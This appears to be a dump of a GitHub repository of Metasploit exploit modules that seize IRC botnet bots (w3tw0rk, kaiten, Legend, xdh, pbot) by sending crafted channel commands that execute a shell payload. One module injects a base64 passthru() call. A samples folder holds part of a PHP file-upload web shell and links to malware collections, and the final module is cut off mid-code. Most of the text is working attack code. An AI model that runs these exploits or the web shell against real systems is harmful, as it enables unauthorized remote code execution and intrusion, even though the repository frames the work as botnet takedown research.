├── malicious_samples ├── README.md ├── open_source_repos.md ├── mma.php ├── RC-Worm.PHP.Caracula ├── pbot.php ├── geoip.php ├── legend.txt ├── kaiten.c └── banyak_irc.pl ├── LICENSE ├── README.md ├── w3tw0rk_exec.rb ├── kaiten_exec.rb ├── legend_bot_exec.rb ├── xdh_x_exec.rb └── pbot_exec.rb /malicious_samples/README.md: -------------------------------------------------------------------------------- 1 | Warning!!! These are malicious files and are for educational purposes. 2 | 3 | All the files in this directory are not mine 4 | -------------------------------------------------------------------------------- /malicious_samples/open_source_repos.md: -------------------------------------------------------------------------------- 1 | ## Open Source Repositories 2 | 3 | - https://github.com/evilxyz/IRC-Bot - Botnet Trojan Based on IRC Protocol by evilxyz 4 | - https://github.com/eurialo/lightaidra - Lightaidra, IRC-based mass router scanner/exploiter 5 | - https://github.com/petikvx/extract-vs-2012-06 - Malware Collection 6 | - https://github.com/petikvx/malwares-collection - collection of sources of Virii - Worms - Trojan 7 | -------------------------------------------------------------------------------- /malicious_samples/mma.php: -------------------------------------------------------------------------------- 1 |

'.php_uname().'
'; 3 | echo ''; 5 | if( $_POST['_upl'] == "Upload" ) { 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'uplod d0n3 in SAME file // Th3 MMA \\

'; } 7 | else { echo 'Upload GAGAL !!!

'; 8 | } } 9 | ?> 10 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 JT 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # IRC Bot Hunters 2 | a collection of Metasploit PoC exploits I wrote for IRC Botnets that takes over the owner of a bot which then allows Remote Code Execution. Most IRC Botnets can be taken over by using their herders' usernames or by triggering a certain command which does shell execution. Almost all of the modules here have been accepted in the Metasploit repository. If you are looking for C&C exploit modules or pwning backdoors like r57 / c99 shell, I have also made [some modules](https://github.com/rapid7/metasploit-framework/search?utf8=%E2%9C%93&q=jay+turla) which I have pushed in the main msf repository. 3 | 4 | ![image](https://cloud.githubusercontent.com/assets/3483615/9675972/44986a28-52f7-11e5-8c1a-76cabf835cb6.png) 5 | 6 | # Accepted Metasploit Modules 7 | 8 | w3tw0rk / Pitbul IRC Bot Remote Code Execution - https://www.rapid7.com/db/modules/exploit/multi/misc/w3tw0rk_exec 9 | 10 | Legend Perl IRC Bot Remote Code Execution - https://www.rapid7.com/db/modules/exploit/multi/misc/legend_bot_exec 11 | 12 | Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution - https://www.rapid7.com/db/modules/exploit/multi/misc/xdh_x_exec 13 | 14 | PHP IRC Bot pbot eval() Remote Code Execution (Credited Only) - https://www.rapid7.com/db/modules/exploit/multi/misc/pbot_exec 15 | 16 | # Some References 17 | w3tw0rk / Pitbull Perl IRC Bot Remote Code Execution PoC Exploit - https://www.exploit-db.com/exploits/36652/ 18 | 19 | Legend Perl IRC Bot - Remote Code Execution - https://www.exploit-db.com/exploits/36836/ 20 | 21 | # Inspiration 22 | - MalwareMustDie! 23 | 24 | # Request for Metasploit Modules? 25 | Want an IRC bot pwned or you have an exploit for an IRC bot that you want to be ported to msf? Contact me at shipcodez@gmail.com 26 | 27 | I am always open for suggestions and new modules as long as you give me details and analysis of a new IRC bot in the wild. Save the world from cavities!!! 28 | -------------------------------------------------------------------------------- /w3tw0rk_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | 9 | class MetasploitModule < Msf::Exploit::Remote 10 | Rank = ExcellentRanking 11 | 12 | include Msf::Exploit::Remote::Tcp 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'w3tw0rk / Pitbul IRC Bot Remote Code Execution', 17 | 'Description' => %q{ 18 | This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot. 19 | }, 20 | 'Author' => 21 | [ 22 | 'Jay Turla' 23 | ], 24 | 'License' => MSF_LICENSE, 25 | 'References' => 26 | [ 27 | [ 'OSVDB', '120384' ], 28 | [ 'EDB', '36652' ] 29 | ], 30 | 'Platform' => %w{ unix win }, 31 | 'Arch' => ARCH_CMD, 32 | 'Payload' => 33 | { 34 | 'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf 35 | 'DisableNops' => true, 36 | 'Compat' => 37 | { 38 | 'PayloadType' => 'cmd', 39 | } 40 | }, 41 | 'Targets' => 42 | [ 43 | [ 'w3tw0rk', { } ] 44 | ], 45 | 'Privileged' => false, 46 | 'DisclosureDate' => 'Jun 04 2015', 47 | 'DefaultTarget' => 0)) 48 | 49 | register_options( 50 | [ 51 | Opt::RPORT(6667), 52 | OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']), 53 | OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']), 54 | OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']) 55 | ], self.class) 56 | end 57 | 58 | def check 59 | connect 60 | 61 | response = register(sock) 62 | if response =~ /463/ or response =~ /464/ 63 | vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") 64 | return Exploit::CheckCode::Unknown 65 | end 66 | 67 | response = join(sock) 68 | if not response =~ /353/ and not response =~ /366/ 69 | vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") 70 | return Exploit::CheckCode::Unknown 71 | end 72 | 73 | quit(sock) 74 | disconnect 75 | 76 | if response =~ /auth/ and response =~ /logged in/ 77 | return Exploit::CheckCode::Vulnerable 78 | else 79 | return Exploit::CheckCode::Safe 80 | end 81 | end 82 | 83 | def send_msg(sock, data) 84 | sock.put(data) 85 | data = "" 86 | begin 87 | read_data = sock.get_once(-1, 1) 88 | while not read_data.nil? 89 | data << read_data 90 | read_data = sock.get_once(-1, 1) 91 | end 92 | rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e 93 | elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") 94 | end 95 | 96 | data 97 | end 98 | 99 | def register(sock) 100 | msg = "" 101 | 102 | if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty? 103 | msg << "PASS #{datastore['IRC_PASSWORD']}\r\n" 104 | end 105 | 106 | if datastore['NICK'].length > 9 107 | nick = rand_text_alpha(9) 108 | print_error("The nick is longer than 9 characters, using #{nick}") 109 | else 110 | nick = datastore['NICK'] 111 | end 112 | 113 | msg << "NICK #{nick}\r\n" 114 | msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n" 115 | 116 | response = send_msg(sock,msg) 117 | return response 118 | end 119 | 120 | def join(sock) 121 | join_msg = "JOIN #{datastore['CHANNEL']}\r\n" 122 | response = send_msg(sock, join_msg) 123 | return response 124 | end 125 | 126 | def w3tw0rk_command(sock) 127 | encoded = payload.encoded 128 | command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n" 129 | response = send_msg(sock, command_msg) 130 | return response 131 | end 132 | 133 | def quit(sock) 134 | quit_msg = "QUIT :bye bye\r\n" 135 | sock.put(quit_msg) 136 | end 137 | 138 | def exploit 139 | connect 140 | 141 | print_status("#{rhost}:#{rport} - Registering with the IRC Server...") 142 | response = register(sock) 143 | if response =~ /463/ or response =~ /464/ 144 | print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") 145 | return 146 | end 147 | 148 | print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...") 149 | response = join(sock) 150 | if not response =~ /353/ and not response =~ /366/ 151 | print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") 152 | return 153 | end 154 | 155 | print_status("#{rhost}:#{rport} - Exploiting the IRC bot...") 156 | w3tw0rk_command(sock) 157 | 158 | quit(sock) 159 | disconnect 160 | end 161 | end 162 | -------------------------------------------------------------------------------- /kaiten_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | 9 | class MetasploitModule < Msf::Exploit::Remote 10 | Rank = ExcellentRanking 11 | 12 | include Msf::Exploit::Remote::Tcp 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Kaiten DDoS IRC Bot Remote Code Execution', 17 | 'Description' => %q{ 18 | This module exploits the remote command execution vulnerability on the kaiten IRC Bot. 19 | kaiten is a known IRC based distributed denial of service client which accepts commands 20 | through its administrator via IRC. 21 | }, 22 | 'Author' => 23 | [ 24 | 'Jay Turla' 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | [ 'URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/shellshock-vulnerability-downloads-kaiten-source-code/' ], 30 | [ 'URL', 'http://blog.malwaremustdie.org/2013/05/story-of-unix-trojan-tsunami-ircbot-w.html' ] #MalwareMustDie 31 | ], 32 | 'Platform' => %w{ unix win }, 33 | 'Arch' => ARCH_CMD, 34 | 'Payload' => 35 | { 36 | 'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf 37 | 'DisableNops' => true, 38 | 'Compat' => 39 | { 40 | 'PayloadType' => 'cmd', 41 | } 42 | }, 43 | 'Targets' => 44 | [ 45 | [ 'kaiten', { } ] 46 | ], 47 | 'Privileged' => false, 48 | 'DisclosureDate' => 'Oct 16 2015', 49 | 'DefaultTarget' => 0)) 50 | 51 | register_options( 52 | [ 53 | Opt::RPORT(6667), 54 | OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']), 55 | OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']), 56 | OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']) 57 | ], self.class) 58 | end 59 | 60 | def check 61 | connect 62 | 63 | response = register(sock) 64 | if response =~ /463/ or response =~ /464/ 65 | vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") 66 | return Exploit::CheckCode::Unknown 67 | end 68 | 69 | response = join(sock) 70 | if not response =~ /353/ and not response =~ /366/ 71 | vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") 72 | return Exploit::CheckCode::Unknown 73 | end 74 | 75 | quit(sock) 76 | disconnect 77 | 78 | if response =~ /auth/ and response =~ /logged in/ 79 | return Exploit::CheckCode::Vulnerable 80 | else 81 | return Exploit::CheckCode::Safe 82 | end 83 | end 84 | 85 | def send_msg(sock, data) 86 | sock.put(data) 87 | data = "" 88 | begin 89 | read_data = sock.get_once(-1, 1) 90 | while not read_data.nil? 91 | data << read_data 92 | read_data = sock.get_once(-1, 1) 93 | end 94 | rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e 95 | elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") 96 | end 97 | 98 | data 99 | end 100 | 101 | def register(sock) 102 | msg = "" 103 | 104 | if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty? 105 | msg << "PASS #{datastore['IRC_PASSWORD']}\r\n" 106 | end 107 | 108 | if datastore['NICK'].length > 9 109 | nick = rand_text_alpha(9) 110 | print_error("The nick is longer than 9 characters, using #{nick}") 111 | else 112 | nick = datastore['NICK'] 113 | end 114 | 115 | msg << "NICK #{nick}\r\n" 116 | msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n" 117 | 118 | response = send_msg(sock,msg) 119 | return response 120 | end 121 | 122 | def join(sock) 123 | join_msg = "JOIN #{datastore['CHANNEL']}\r\n" 124 | response = send_msg(sock, join_msg) 125 | return response 126 | end 127 | 128 | def kaiten_command(sock) 129 | encoded = payload.encoded 130 | command_msg = "PRIVMSG #{datastore['CHANNEL']} :!* SH #{encoded}\r\n" 131 | response = send_msg(sock, command_msg) 132 | return response 133 | end 134 | 135 | def quit(sock) 136 | quit_msg = "QUIT :bye bye\r\n" 137 | sock.put(quit_msg) 138 | end 139 | 140 | def exploit 141 | connect 142 | 143 | print_status("#{peer} - Registering with the IRC Server...") 144 | response = register(sock) 145 | if response =~ /463/ or response =~ /464/ 146 | print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") 147 | return 148 | end 149 | 150 | print_status("#{peer} - Joining the #{datastore['CHANNEL']} channel...") 151 | response = join(sock) 152 | if not response =~ /353/ and not response =~ /366/ 153 | print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") 154 | return 155 | end 156 | 157 | print_status("#{peer} - Exploiting the kaiten IRC bot...") 158 | kaiten_command(sock) 159 | 160 | quit(sock) 161 | disconnect 162 | end 163 | end 164 | -------------------------------------------------------------------------------- /legend_bot_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | 10 | Rank = ExcellentRanking 11 | 12 | include Msf::Exploit::Remote::Tcp 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Legend Perl IRC Bot Remote Code Execution', 17 | 'Description' => %q{ 18 | This module exploits a remote command execution on the Legend Perl IRC Bot . 19 | This bot has been used as a payload in the Shellshock spam last October 2014. 20 | This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and 21 | UDP flooding, the ability to remove system logs, and ability to gain root, and 22 | VNC scanning. 23 | 24 | Kevin Stevens, a Senior Threat Researcher at Damballa has uploaded this script 25 | to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76. 26 | }, 27 | 'Author' => 28 | [ 29 | 'Jay Turla' # msf and initial discovery 30 | ], 31 | 'License' => MSF_LICENSE, 32 | 'References' => 33 | [ 34 | [ 'OSVDB', '121681' ], 35 | [ 'EDB', '36836' ], 36 | [ 'URL', 'https://www.damballa.com/perlbotnado/' ], 37 | [ 'URL', 'http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html' ] # Shellshock spam October 2014 details 38 | ], 39 | 'Platform' => %w{ unix win }, 40 | 'Arch' => ARCH_CMD, 41 | 'Payload' => 42 | { 43 | 'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf 44 | 'DisableNops' => true, 45 | 'Compat' => 46 | { 47 | 'PayloadType' => 'cmd' 48 | } 49 | }, 50 | 'Targets' => 51 | [ 52 | [ 'Legend IRC Bot', { } ] 53 | ], 54 | 'Privileged' => false, 55 | 'DisclosureDate' => 'Apr 27 2015', 56 | 'DefaultTarget' => 0)) 57 | 58 | register_options( 59 | [ 60 | Opt::RPORT(6667), 61 | OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']), 62 | OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']), 63 | OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']) 64 | ], self.class) 65 | end 66 | 67 | def check 68 | connect 69 | 70 | res = register(sock) 71 | if res =~ /463/ || res =~ /464/ 72 | vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") 73 | return Exploit::CheckCode::Unknown 74 | end 75 | 76 | res = join(sock) 77 | if !res =~ /353/ && !res =~ /366/ 78 | vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") 79 | return Exploit::CheckCode::Unknown 80 | end 81 | 82 | quit(sock) 83 | disconnect 84 | 85 | if res =~ /auth/ && res =~ /logged in/ 86 | Exploit::CheckCode::Vulnerable 87 | else 88 | Exploit::CheckCode::Safe 89 | end 90 | end 91 | 92 | def send_msg(sock, data) 93 | sock.put(data) 94 | data = "" 95 | begin 96 | read_data = sock.get_once(-1, 1) 97 | while !read_data.nil? 98 | data << read_data 99 | read_data = sock.get_once(-1, 1) 100 | end 101 | rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e 102 | elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") 103 | end 104 | 105 | data 106 | end 107 | 108 | def register(sock) 109 | msg = "" 110 | 111 | if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty? 112 | msg << "PASS #{datastore['IRC_PASSWORD']}\r\n" 113 | end 114 | 115 | if datastore['NICK'].length > 9 116 | nick = rand_text_alpha(9) 117 | print_error("The nick is longer than 9 characters, using #{nick}") 118 | else 119 | nick = datastore['NICK'] 120 | end 121 | 122 | msg << "NICK #{nick}\r\n" 123 | msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n" 124 | 125 | send_msg(sock,msg) 126 | end 127 | 128 | def join(sock) 129 | join_msg = "JOIN #{datastore['CHANNEL']}\r\n" 130 | send_msg(sock, join_msg) 131 | end 132 | 133 | def legend_command(sock) 134 | encoded = payload.encoded 135 | command_msg = "PRIVMSG #{datastore['CHANNEL']} :!legend #{encoded}\r\n" 136 | send_msg(sock, command_msg) 137 | end 138 | 139 | def quit(sock) 140 | quit_msg = "QUIT :bye bye\r\n" 141 | sock.put(quit_msg) 142 | end 143 | 144 | def exploit 145 | connect 146 | 147 | print_status("#{rhost}:#{rport} - Registering with the IRC Server...") 148 | res = register(sock) 149 | if res =~ /463/ || res =~ /464/ 150 | print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") 151 | return 152 | end 153 | 154 | print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...") 155 | res = join(sock) 156 | if !res =~ /353/ && !res =~ /366/ 157 | print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") 158 | return 159 | end 160 | 161 | print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...") 162 | legend_command(sock) 163 | 164 | quit(sock) 165 | disconnect 166 | end 167 | 168 | end 169 | -------------------------------------------------------------------------------- /xdh_x_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | 10 | Rank = ExcellentRanking 11 | 12 | include Msf::Exploit::Remote::Tcp 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution', 17 | 'Description' => %q{ 18 | This module allows remote command execution on an IRC Bot developed by xdh. 19 | This perl bot was caught by Conor Patrick with his shellshock honeypot server 20 | and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). Matt 21 | Thayer also found this script which has a description of LinuxNet perlbot. 22 | 23 | The bot answers only based on the servername and nickname in the IRC message 24 | which is configured on the perl script thus you need to be an operator on the IRC 25 | network to spoof it and in order to exploit this bot or have at least the same ip 26 | to the config. 27 | }, 28 | 'Author' => 29 | [ 30 | #MalwareMustDie 31 | 'Jay Turla', # msf 32 | 'Conor Patrick', # initial discovery and botnet analysis for xdh 33 | 'Matt Thayer' # initial discovery for LinuxNet perlbot 34 | ], 35 | 'License' => MSF_LICENSE, 36 | 'References' => 37 | [ 38 | [ 'URL', 'https://conorpp.com/blog/a-close-look-at-an-operating-botnet/' ], 39 | [ 'URL', 'https://twitter.com/MrMookie/status/673389285676965889' ], # Matt's discovery 40 | [ 'URL', 'https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities' ] # details of what an fBot is 41 | ], 42 | 'Platform' => %w{ unix win }, 43 | 'Arch' => ARCH_CMD, 44 | 'Payload' => 45 | { 46 | 'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf 47 | 'DisableNops' => true, 48 | 'Compat' => 49 | { 50 | 'PayloadType' => 'cmd' 51 | } 52 | }, 53 | 'Targets' => 54 | [ 55 | [ 'xdh Botnet / LinuxNet perlbot', { } ] 56 | ], 57 | 'Privileged' => false, 58 | 'DisclosureDate' => 'Dec 04 2015', 59 | 'DefaultTarget' => 0)) 60 | 61 | register_options( 62 | [ 63 | Opt::RPORT(6667), 64 | OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']), 65 | OptString.new('NICK', [true, 'IRC Nickname', 'msfuser']), # botnet administrator name 66 | OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']) 67 | ], self.class) 68 | end 69 | 70 | def check 71 | connect 72 | 73 | res = register(sock) 74 | if res =~ /463/ || res =~ /464/ 75 | vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") 76 | return Exploit::CheckCode::Unknown 77 | end 78 | 79 | res = join(sock) 80 | if !res =~ /353/ && !res =~ /366/ 81 | vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") 82 | return Exploit::CheckCode::Unknown 83 | end 84 | 85 | quit(sock) 86 | disconnect 87 | 88 | if res =~ /auth/ && res =~ /logged in/ 89 | Exploit::CheckCode::Vulnerable 90 | else 91 | Exploit::CheckCode::Safe 92 | end 93 | end 94 | 95 | def send_msg(sock, data) 96 | sock.put(data) 97 | data = "" 98 | begin 99 | read_data = sock.get_once(-1, 1) 100 | while !read_data.nil? 101 | data << read_data 102 | read_data = sock.get_once(-1, 1) 103 | end 104 | rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e 105 | elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") 106 | end 107 | 108 | data 109 | end 110 | 111 | def register(sock) 112 | msg = "" 113 | 114 | if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty? 115 | msg << "PASS #{datastore['IRC_PASSWORD']}\r\n" 116 | end 117 | 118 | if datastore['NICK'].length > 9 119 | nick = rand_text_alpha(9) 120 | print_error("The nick is longer than 9 characters, using #{nick}") 121 | else 122 | nick = datastore['NICK'] 123 | end 124 | 125 | msg << "NICK #{nick}\r\n" 126 | msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n" 127 | 128 | send_msg(sock,msg) 129 | end 130 | 131 | def join(sock) 132 | join_msg = "JOIN #{datastore['CHANNEL']}\r\n" 133 | send_msg(sock, join_msg) 134 | end 135 | 136 | def xdh_command(sock) 137 | encoded = payload.encoded 138 | command_msg = "PRIVMSG #{datastore['CHANNEL']} :.say #{encoded}\r\n" 139 | send_msg(sock, command_msg) 140 | end 141 | 142 | def quit(sock) 143 | quit_msg = "QUIT :bye bye\r\n" 144 | sock.put(quit_msg) 145 | end 146 | 147 | def exploit 148 | connect 149 | 150 | print_status("#{rhost}:#{rport} - Registering with the IRC Server...") 151 | res = register(sock) 152 | if res =~ /463/ || res =~ /464/ 153 | print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") 154 | return 155 | end 156 | 157 | print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...") 158 | res = join(sock) 159 | if !res =~ /353/ && !res =~ /366/ 160 | print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") 161 | return 162 | end 163 | 164 | print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...") 165 | xdh_command(sock) 166 | 167 | quit(sock) 168 | disconnect 169 | end 170 | 171 | end 172 | -------------------------------------------------------------------------------- /pbot_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | 9 | class MetasploitModule < Msf::Exploit::Remote 10 | Rank = ExcellentRanking 11 | 12 | include Msf::Exploit::Remote::Tcp 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'PHP IRC Bot pbot eval() Remote Code Execution', 17 | 'Description' => %q{ 18 | This module allows remote command execution on the PHP IRC bot pbot by abusing 19 | the usage of eval() in the implementation of the .php command. In order to work, 20 | the data to connect to the IRC server and channel where find pbot must be provided. 21 | The module has been successfully tested on the version of pbot analyzed by Jay 22 | Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP 23 | SP3. 24 | }, 25 | 'Author' => 26 | [ 27 | 'evilcry', # pbot analysis' 28 | 'Jay Turla', # pbot analysis 29 | 'bwall', # aka @bwallHatesTwits, PoC 30 | 'juan vazquez' # Metasploit module 31 | ], 32 | 'License' => MSF_LICENSE, 33 | 'References' => 34 | [ 35 | [ 'OSVDB', '84913' ], 36 | [ 'EDB', '20168' ], 37 | [ 'URL', 'http://resources.infosecinstitute.com/pbot-analysis/'] 38 | ], 39 | 'Platform' => %w{ unix win }, 40 | 'Arch' => ARCH_CMD, 41 | 'Payload' => 42 | { 43 | 'Space' => 344, # According to RFC 2812, the max length message is 512, including the cr-lf 44 | 'BadChars' => '', 45 | 'DisableNops' => true, 46 | 'Compat' => 47 | { 48 | 'PayloadType' => 'cmd', 49 | } 50 | }, 51 | 'Targets' => 52 | [ 53 | [ 'pbot', { } ] 54 | ], 55 | 'Privileged' => false, 56 | 'DisclosureDate' => 'Nov 02 2009', 57 | 'DefaultTarget' => 0)) 58 | 59 | register_options( 60 | [ 61 | Opt::RPORT(6667), 62 | OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']), 63 | OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']), 64 | OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']), 65 | OptString.new('PBOT_PASSWORD', [false, 'pbot Password', '']) 66 | ], self.class) 67 | end 68 | 69 | def check 70 | connect 71 | 72 | response = register(sock) 73 | if response =~ /463/ or response =~ /464/ 74 | vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") 75 | return Exploit::CheckCode::Unknown 76 | end 77 | 78 | response = join(sock) 79 | if not response =~ /353/ and not response =~ /366/ 80 | vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") 81 | return Exploit::CheckCode::Unknown 82 | end 83 | response = pbot_login(sock) 84 | quit(sock) 85 | disconnect 86 | 87 | if response =~ /auth/ and response =~ /logged in/ 88 | return Exploit::CheckCode::Vulnerable 89 | else 90 | return Exploit::CheckCode::Safe 91 | end 92 | end 93 | 94 | def send_msg(sock, data) 95 | sock.put(data) 96 | data = "" 97 | begin 98 | read_data = sock.get_once(-1, 1) 99 | while not read_data.nil? 100 | data << read_data 101 | read_data = sock.get_once(-1, 1) 102 | end 103 | rescue EOFError 104 | end 105 | data 106 | end 107 | 108 | def register(sock) 109 | msg = "" 110 | 111 | if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty? 112 | msg << "PASS #{datastore['IRC_PASSWORD']}\r\n" 113 | end 114 | 115 | if datastore['NICK'].length > 9 116 | nick = rand_text_alpha(9) 117 | print_error("The nick is longer than 9 characters, using #{nick}") 118 | else 119 | nick = datastore['NICK'] 120 | end 121 | 122 | msg << "NICK #{nick}\r\n" 123 | msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n" 124 | 125 | response = send_msg(sock,msg) 126 | return response 127 | end 128 | 129 | def join(sock) 130 | join_msg = "JOIN #{datastore['CHANNEL']}\r\n" 131 | response = send_msg(sock, join_msg) 132 | return response 133 | end 134 | 135 | def pbot_login(sock) 136 | login_msg = "PRIVMSG #{datastore['CHANNEL']} :.login" 137 | if datastore['PBOT_PASSWORD'] and not datastore['PBOT_PASSWORD'].empty? 138 | login_msg << " #{datastore['PBOT_PASSWORD']}" 139 | end 140 | login_msg << "\r\n" 141 | response = send_msg(sock, login_msg) 142 | return response 143 | end 144 | 145 | def pbot_command(sock) 146 | encoded = Rex::Text.encode_base64(payload.encoded) 147 | command_msg = "PRIVMSG #{datastore['CHANNEL']} :.php #{rand_text_alpha(1)} passthru(base64_decode(\"#{encoded}\"));\r\n" 148 | response = send_msg(sock, command_msg) 149 | return response 150 | end 151 | 152 | def quit(sock) 153 | quit_msg = "QUIT :bye bye\r\n" 154 | sock.put(quit_msg) 155 | end 156 | 157 | def exploit 158 | connect 159 | 160 | print_status("#{rhost}:#{rport} - Registering with the IRC Server...") 161 | response = register(sock) 162 | if response =~ /463/ or response =~ /464/ 163 | print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") 164 | return 165 | end 166 | 167 | print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...") 168 | response = join(sock) 169 | if not response =~ /353/ and not response =~ /366/ 170 | print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") 171 | return 172 | end 173 | 174 | print_status("#{rhost}:#{rport} - Registering with the pbot...") 175 | response = pbot_login(sock) 176 | if not response =~ /auth/ or not response =~ /logged in/ 177 | 